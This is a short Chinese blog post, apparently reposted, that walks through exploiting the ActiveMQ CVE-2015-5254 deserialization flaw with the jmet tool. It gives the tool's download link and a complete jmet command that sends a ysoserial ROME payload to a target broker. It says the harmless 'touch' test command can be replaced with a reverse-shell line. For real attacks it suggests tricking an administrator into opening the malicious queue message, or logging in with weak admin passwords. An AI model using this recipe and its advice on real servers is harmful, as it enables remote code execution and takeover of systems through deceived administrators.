ActiveMQ CVE-2015-5254 反序列化漏洞利用

2019年10月12日23:39:10 评论 102

所需工具jmet 下载地址:https://github.com/matthiaskaiser/jmet/releases
文件下载后在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)

图中敏感信息已经打码,不影响复现

首先访问一下目标web页面,查看是否正常
ActiveMQ CVE-2015-5254 反序列化漏洞利用
OK,正常,然后开始复现漏洞,使用jmet,jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 10.1.1.1 61616

ActiveMQ CVE-2015-5254 反序列化漏洞利用
此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://10.1.1.1:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
ActiveMQ CVE-2015-5254 反序列化漏洞利用
点击查看这条消息即可触发命令执行,此时进入服务器,可见/tmp/success已成功创建,说明漏洞利用成功:
ActiveMQ CVE-2015-5254 反序列化漏洞利用
将命令替换成弹shell语句再利用即可成功反弹shell

这里有一点比较鸡肋的是,漏洞的触发要诱导管理员点击那个消息,所以在实战中要就要想办法让管理员点击,或者有管理员弱口令进去也可以

http://www.oniont.cn/index.php/archives/274.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: